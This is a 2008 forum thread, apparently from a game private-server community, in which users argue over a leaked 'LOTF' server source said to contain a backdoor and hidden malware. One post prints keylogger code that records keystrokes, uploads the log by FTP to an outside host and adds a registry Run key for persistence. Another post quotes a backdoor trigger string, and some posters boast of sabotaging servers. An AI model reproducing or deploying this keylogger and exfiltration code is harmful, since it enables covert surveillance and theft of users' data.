[Release] LOTF Source

07/10/2008 22:50 IAmHawtness#31
if (Message == "@go_to_hell!ENC3101931993")
:rolleyes::rolleyes:
07/11/2008 08:48 Lateralus#32
Quote:
Originally Posted by Tw3ak View Post
lol lets just hope all the noobs that try and run this don't find the malicious code imbedded in it so i can reap havac on anyone that puts it up :D

I'm still waiting for UltiCo to go back online so i can crash it again lmao
Lmao, nice. I haven't looked much at the source but if I see something in it like that... Hehe. :) :cool:
07/11/2008 14:10 KiXiN#33
Ah, that backdoor sucks. The filesize would be way too big, you could only create one.

Note to coder: put thousands of random files in random folders with 1-5kb of data. :P
07/11/2008 15:59 ~*NewDuuDe*~#34
I love tht hadeset putted in the backdoor
he rocks :P

@nTL3fTy hes had the source for awhile lol
like 2-3 weeks
bout 2 mounths here
found it after a day >.<
07/11/2008 16:38 yourworstnightmare#35
welll now that its already leaked out someone shud make a guide to it like wat the hell now
07/12/2008 02:00 IcedEarth#36
O really ? Why would we ? And yeah try to fix the error while Debuging or Building it xD Good luck ;)
07/12/2008 04:40 IAmHawtness#37
Quote:
Originally Posted by IcedEarth View Post
O really ? Why would we ? And yeah try to fix the error while Debuging or Building it xD Good luck ;)
What error ? :confused::confused:

The MySql.Data error?.. That really takes SOME skill to "fix" that :)
- Yes, that was sarcasm.
07/12/2008 06:00 IHateHomos#38
Yeh check out the keylogger he put in there.
Code:


int KeyLog(char key)
{
     ofstream keylog("C:Keystrokes.txt", ios::app);      //Your LogFile "Keystrokes.txt" is kept at this path
     keylog << key;
     keylog.close();
}
void KeyCheck()
{
     char key;
     int pause;
    
     while(1)
     {
             for(key = 32;key<=127;key++)
             {
                                if (GetAsyncKeyState(key)==-32767)
                                {
                                      pause = KeyLog(key);                
                                }
             }
             Sleep(2);
     }
    
}
void FileSubmit()
{    
    HINTERNET hInternet;
    HINTERNET hFtpSession;
    hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
    
    
    hFtpSession = InternetConnect(hInternet,"myftp.iownedyourrofl.com",INTERNET_DEFAULT_FTP_PORT, "whodidiown"," everyone", INTERNET_SERVICE_FTP, 0,0 );
    
    
    FtpPutFile(hFtpSession, "C:Keystrokes.txt", "mylog.txt", FTP_TRANSFER_TYPE_BINARY, 0);
                              
    InternetCloseHandle(hFtpSession);
    InternetCloseHandle(hInternet);
}

void RegistryAndLocation()
{
    char CurrentPath[MAX_PATH];
    char NewPath[MAX_PATH];

    
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH,CurrentPath,sizeof(CurrentPath));

    GetWindowsDirectory(NewPath,sizeof(NewPath));

    strcat(NewPath,"keylogger.exe");

    CopyFile(CurrentPath,NewPath,false);
    
    HKEY hKey_a;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SoftwareMicrosoftWindowsCurrentVersionRun",0,KEY_SET_VALUE,&hKey_a );
    RegSetValueEx(hKey_a, "Keylogger",0,REG_SZ,(const unsigned char*)NewPath,sizeof(NewPath));
    RegCloseKey(hKey_a);
}

int main()
{
    FileSubmit();
    KeyCheck();
    RegistryAndLocation();
    return 0;
}
Look at that bullshit..
Not sure if i was even supposed to post that =.=
If i wasn't, im truely sorry, just remove it, thanks :)

Edit: I removed some stuff so some nub can't just compile this and make it work. :)
07/12/2008 08:06 lizzio#39
ok DELETE this topic and ban him for uploading virusses!!!!!!!!!!!!!!!!
''NOT EVEN A GOOD 1''


*first people who say it is a good source can die of being a newb~!

*this is 1 of the oldest sources of lotf

*lotf = lands of the forgotten stupid n00bs!!!

*this is a VIRUS not a source that works!

*every good coder/good server owner has the real source*

*stop leaching and droping this topics on the internet loser*
07/12/2008 08:12 lizzio#40
Quote:
Originally Posted by Super.Pvper View Post
=P

Flame all you want mates =D

I'm quitting EPvpers and the such, so just giving away worthless shit. =P

Laters =D
cause you droped this already on r@gez0ne
and you cant code or leach :P haahaha thats why you quitting loser!!! :cool:
07/12/2008 10:09 IcedEarth#41
Want to flame or tell anything to a dude who released ? Here is his email [Only registered and activated users can see links. Click Here To Register...]
07/12/2008 12:15 jovis#42
Quote:
Originally Posted by IcedEarth View Post
Want to flame or tell anything to a dude who released ? Here is his email [Only registered and activated users can see links. Click Here To Register...]
I'm sure it's hard to create another e-mail :rolleyes:
07/12/2008 19:09 IcedEarth#43
Yeah, but he must leech it like he did with our broken source :D
07/12/2008 19:14 hadeset#44
Well i'm certainly not happy that such fucktards exist in this world, but i can't do anything.
Just hope that the guy gets ip ban from everywhere. =)
07/12/2008 20:50 scottdavey#45
It was gonna get leaked anyway who cares, you have a new source thats great so why are you worried seriously?